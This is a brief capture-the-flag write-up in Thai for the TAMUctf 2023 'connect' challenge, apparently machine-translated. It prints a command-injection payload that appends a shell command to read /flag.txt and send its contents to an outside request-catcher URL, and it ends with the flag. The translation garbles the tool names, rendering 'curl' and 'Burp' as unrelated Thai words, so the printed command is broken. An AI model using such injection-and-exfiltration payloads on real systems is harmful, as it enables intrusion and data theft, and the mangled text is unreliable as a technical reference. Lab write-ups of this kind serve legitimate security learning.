TAMUctf 2023 — เชื่อมต่อการเขียน
May 01 2023
ความท้าทายนี้สร้างโดย Mr. Blade ดาวน์โหลดการเชื่อมต่อ
ความท้าทายนี้สร้างโดย Mr. Blade
ดาวน์โหลดไฟล์ connect.zip เรามี app.py
ฉันได้แก้ไขสิ่งนั้นเพื่อให้สามารถเรียกใช้และทดสอบในเครื่องได้

เราสามารถเพิ่มเติมคำสั่งได้โดยการเพิ่ม; .
ฉันได้สร้างตัวจับคำขอด้วยhttps://requestcatcher.com/เพื่อจับภาพคำขอ
มาทำ command injection โดยเพิ่ม; ขด -s https://flag.requestcatcher.com/$(cat /flag.txt)
เส้นทางธงระบุไว้ในคำอธิบายความท้าทาย

ฉันใช้เรอและ url เข้ารหัสเพย์โหลด มาดูตัวจับคำขอกัน

ค่าสถานะคือgigem{p00r_f1lt3rs_m4k3_f0r_p00r_s3cur1ty}
ขอบคุณที่อ่าน.
มีความสุขแฮ็ค!